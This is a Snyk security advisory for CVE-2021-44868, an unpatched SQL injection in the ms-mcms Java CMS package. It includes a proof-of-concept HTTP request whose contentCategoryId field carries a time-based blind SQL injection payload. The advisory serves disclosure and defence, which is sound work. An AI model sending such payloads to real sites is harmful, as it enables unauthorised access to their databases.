SQL Injection Affecting net.mingsoft:ms-mcms package, versions [0,]
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.2% (59th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-NETMINGSOFT-2404812
- published 18 Feb 2022
- disclosed 18 Feb 2022
- credit chauncyman
Introduced: 18 Feb 2022
CVE-2021-44868 Open this link in a new tabHow to fix?
There is no fixed version for net.mingsoft:ms-mcms.
Overview
Affected versions of this package are vulnerable to SQL Injection due to improper input sanitization in categoryId parameter in ContentBizImpl.java.
PoC:
POST /ms/cms/content/list.do HTTP/1.1
Host: cms.demo.mingsoft.net
Content-Length: 21
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://cms.demo.mingsoft.net
Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ****
Connection: close
contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'
References
CVSS Scores
version 3.1